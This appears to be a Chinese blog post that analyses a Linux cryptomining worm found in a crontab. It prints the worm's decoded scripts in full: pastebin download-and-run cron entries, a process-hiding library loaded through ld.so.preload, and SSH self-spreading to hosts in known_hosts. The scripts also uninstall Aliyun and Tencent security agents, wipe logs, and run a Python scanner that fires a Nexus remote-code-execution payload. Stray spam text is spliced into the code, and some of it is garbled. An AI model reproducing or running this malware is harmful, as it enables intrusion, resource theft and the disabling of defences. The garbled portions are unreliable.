crontab可疑⾏
# crontab脚本,删掉后会⾃动重写
*/23 * * * * (curl -fsSL pastebin/raw/qbbSdzZd||wget -q -O- pastebin/raw/qbbSdzZd)|sh
查看其中的qbbSdzZd⽂件
>wget pastebin/raw/qbbSdzZd &&cat qbbSdzZd
# 得到
(curl -fsSL pastebin/raw/T8zYizW2 ||wget -q -O- pastebin/raw/T8zYizW2)|base64 -d |/bin/bash
>wget pastebin/raw/T8zYizW2 | base64 -d
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function b(){
pkill wnTKYg &&pkill ddg* &&rm -rf /tmp/ddg* &&rm -rf /tmp/wnTKYg
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3020 /tmp/ddgs.3020 /tmp/wnTKYg /tmp/2t3ik
ps auxf|grep -v grep|grep"xmr"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"xig"|awk'{print $2}'|xargs kill -9屯留二中
ps auxf|grep -v grep|grep"ddgs"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"qW3xT"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"t00ls.ru"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"sustes"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"Xbash"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"cranbery"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"stratum"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"minerd"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"wnTKYg"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"thisxxs"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep"hashfish"|awk'{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep /opt/yilu/mservice|awk'{print $2}'|xargs kill -9
微电脑世界
ps auxf|grep -v grep|grep /usr/bin/.sshd|awk'{print $2}'|xargs kill -9
ps auxf |grep -v grep|grep hwlh3wlh44lh |awk'{print $2}'|xargs kill -9
ps auxf |grep -v grep|grep Circle_MI |awk'{print $2}'|xargs kill -9
ps auxf |grep -v grep|grep get.bi-chi |awk'{print $2}'|xargs kill -9
ps auxf |grep -v grep|grep hashvault.pro |awk'{print $2}'|xargs kill -9
ps auxf |grep -v grep| |awk'{print $2}'|xargs kill -9
ps auxf |grep -v grep|grep /usr/bin/.sshd |awk'{print $2}'|xargs kill -9
ps auxf |grep -v grep|grep /usr/bin/bsd-port |awk'{print $2}'|xargs kill -9
p=$(ps auxf|grep -v grep|grep sysinfo|wc -l)
if[${p} -eq 0 ];then
ps auxf|grep -v grep|awk'{if($3>=80.0) print $2}'|xargs kill -9
fi
}
function d(){
ARCH=$(uname -i)
if["$ARCH"=="x86_64"];then
mkdir -p /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
chmod 1777 /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
(curl -fsSL --connect-timeout 120 alonecode.ml/linux/sysinfo -o /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/s ysinfo \
||wget alonecode.ml/linux/sysinfo -O /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo) \
&&chmod +x /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo
nohup /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo >/dev/null 2>1 &
else
mkdir -p /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
mkdir -p /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
chmod 1777 /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
(curl -fsSL --connect-timeout 120 alonecode.ml/linux/sysinfo -o /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwn Oy/sysinfo \
||wget alonecode.ml/linux/sysinfo -O /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo) \
&&chmod +x /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo
nohup /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo >/dev/null 2>1 &
fi
}
function e(){
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM 6Ly9wYXN0ZWJpbi5jb20vcmF3L3hUV3B5MmcxJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQog ICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))">/dev/null 2>&1 &
touch /tmp/.38t9guft0055d0565u444gtjr0
}
function c(){
chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload
(curl -fsSL --connect-timeout 120 pastebin/raw/cBjiacdv -o /usr/local/bin/dns \
||wget pastebin/raw/cBjiacdv -O /usr/local/bin/dns) \
&&chmod 755 /usr/local/bin/dns \
&&touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns
echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /usr/local/bin/dns"> /etc/crontab &&touch -acmr /bin/sh /etc/crontab
echo -e "*/10 * * * * root (curl -fsSL pastebin/raw/qbbSdzZd||wget -q -O- pastebin/raw/qbbSdzZd)|sh\n##"> /etc/cron.d/root &&touc h -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root
echo -e "*/17 * * * * root (curl -fsSL pastebin/raw/qbbSdzZd||wget -q -O- pastebin/raw/qbbSdzZd)|sh\n##"> /etc/cron.d/apache &&t ouch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache
echo -e "*/23 * * * * (curl -fsSL pastebin/raw/qbbSdzZd||wget -q -O- pastebin/raw/qbbSdzZd)|sh\n##"> /var/spool/cron/root &&touc h -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL pastebin/raw/qbbSdzZd||wget -q -O- pastebin/raw/qbbSdzZd)|sh\n##"> /var/spool/cron/crontabs/roo t &&touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 pastebin/raw/qbbSdzZd -o /etc/cron.hourly/oanacroner||wget pastebin/raw/qbbSdzZd -O /etc/cro n.hourly/oanacroner)&&chmod 755 /etc/cron.hourly/oanacroner
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 pastebin/raw/qbbSdzZd -o /etc/cron.daily/oanacroner||wget pastebin/raw/qbbSdzZd -O /etc/cron. daily/oanacroner)&&chmod 755 /etc/cron.daily/oanacroner
mkdir -p /hly
(curl -fsSL --connect-timeout 120 pastebin/raw/qbbSdzZd -o /hly/oanacroner||wget pastebin/raw/qbbSdzZd -O /etc/hly/oanacroner)&&chmod 755 /hly/oanacroner
mkdir -p /usr/local/lib/
if[! -f "/usr/local/lib/libdns.so"];then
curl -fsSL --connect-timeout 120 alonecode.ml/libprocesshider.so -o /usr/local/lib/libdns.so &&chmod 755 /usr/local/lib/libdns.so &&touch -acmr /bin /sh /usr/local/lib/libdns.so && chattr +i /usr/local/lib/libdns.so
if[! -f "/usr/local/lib/libdns.so"];then
wget alonecode.ml/libprocesshider.so -O /usr/local/lib/libdns.so \
&&chmod 755 /usr/local/lib/libdns.so \
&&touch -acmr /bin/sh /usr/local/lib/libdns.so \
&& chattr +i /usr/local/lib/libdns.so
fi
fi
echo /usr/local/lib/libdns.so > /etc/ld.so.preload
touch -acmr /bin/sh /etc/ld.so.preload
touch -acmr /bin/sh /usr/local/lib/libdns.so
chattr -i /etc/ld.so.preload &&echo /usr/local/lib/libdns.so > /etc/ld.so.preload &&touch -acmr /bin/sh /etc/ld.so.preload
if[ -f /root/.ssh/known_hosts ]&&[ -f /root/.ssh/id_rsa.pub ];then
# 两个分号的地⽅应该只有⼀个,多的⼀个是我加的,为了语法⾼亮。这⾥是到know_hosts的机器⾥⾯免密登陆的机器,下载并运⾏病毒 for h in$(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"" /root/.ssh/known_hosts);do
ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h \
'(curl -fsSL pastebin/raw/qbbSdzZd ||wget -q -O- pastebin/raw/qbbSdzZd)|sh' &
done
思想政治工作
研究done
fi
touch -acmr /bin/sh /etc/cron.hourly/oanacroner
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /hly/oanacroner
}
function a(){#卸载安全程序
if ps aux |grep -i '[a]liyun';then
wget update.aegis.aliyun/download/uninstall.sh
chmod +x uninstall.sh
./uninstall.sh
wget update.aegis.aliyun/download/quartz_uninstall.sh
chmod +x quartz_uninstall.sh
./quartz_uninstall.sh
rm -f uninstall.sh quartz_uninstall.sh
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*;
elif ps aux |grep -i '[y]unjing';then
/usr/local/qcloud/stargate/admin/uninstall.sh
/
usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
touch /tmp/.a
}
mkdir -p /tmp
chmod 1777 /tmp
if[! -f "/tmp/.a" ]; then
a
fi
b
c
port=$(netstat -an |grep :3333 |wc -l)
if [ ${port} -eq 0 ];then
d
fi
if [ ! -f "/tmp/.38t9guft0055d0565u444gtjr0" ];then
e
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#
将上述代码的e函数拿出来
python -c import base64;
exec(
base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hU V3B5MmcxJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6C iAgICBwYXNz')
)
解码
#coding: utf-8
import urllib
import base64
d='pastebin/raw/xTWpy2g1'
try:
page=base64.b64decode(urllib.urlopen(d).read())
exec(page)
except:
pass
再解码
# -*- coding: utf-8 -*-
import requests
import threading
import time
import socket
from xmlrpclib import ServerProxy
from re import findall
import os
import json
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# import redis
from bs4 import BeautifulSoup
Number =0
ThreadNumberGo =0
Victor =0
a3 =0
a4 =0
A =0
NexusLDNumber =0
NexusVNumber =0
ThinkphpLDNumber =0
ThinkphpVNumber =0
RedisLDNumber =0
RedisVNumber =0
SupervisordLDNumber =0
SupervisordVNumber =0
class Thread (threading.Thread):
def__init__(self):
threading.Thread.__init__(self)
def run(self):
global a3
IP_list(a3)
def IP_list(a3):
global ThreadNumberGo
global ip
ThreadNumberGo +=1
ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip() ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0,255):
ip_list2 =(ips2 +(str(i)))
for g in range(1,255):
ip = ip_list2 +'.'+(str(g))
try:
Nexus(ip)
except:
except:
try:
Thinkphp(ip)
except:
try:
Redis(ip)
except:
try:
Supervisord(ip,"9000")
except:
try:
Supervisord(ip,"9001")
except:
try:
Supervisord(ip,"9002")
except:
try:
Supervisord(ip,"9003")
except:
try:
Supervisord(ip,"8090")
except:
try:
Supervisord(ip,"7001")
except:
try:
Supervisord(ip,"9999")
except:
try:
Supervisord(ip,"80")
except:
try:
Supervisord(ip,"9100")
except:
pass
ThreadNumberGo -=1
def Nexus(IP):
url ="{0}:8081/".format(IP)
html = (url,timeout=5)
html =
if html.find("Nexus Repository Manager")>0:
if html.find("/static/rapture/resources/favicon.ico?_v=")>0:
if int(html[html.find("/static/rapture/resources/favicon.ico?_v=")+len("/static/rapture/resources/favicon.ico?_v=3."):html.find(".",html.find("/static/rapt ure/resources/favicon.ico?_v=")+len("/static/rapture/resources/favicon.ico?_v=3."))])<15:
def Attack(ip,port,Command):
AccUrl ="{0}:{1}".format(ip,port)+"/service/extdirect"
data ={"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"} ],"filter":
[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('{0}')". format(Command)},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
headers ={
提出教师节的人"Host":"{0}:{1}".format(ip,port),
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101",
"Accept":"*/*",
"Content-Type":"application/json",
"X-Requested-With":"XMLHttpRequest",
"Content-Length":"368",
"Connection":"close"
}有奖发票
requests.post(AccUrl,data=json.dumps(data),headers=headers,timeout=10)
Attack(IP,"8081","curl -fsSL pastebin/raw/b5p2r6DQ -o /tmp/sh-thd-1555254163650")
豫公网安备41160202000603
站长QQ:729038198
关于我们
投诉建议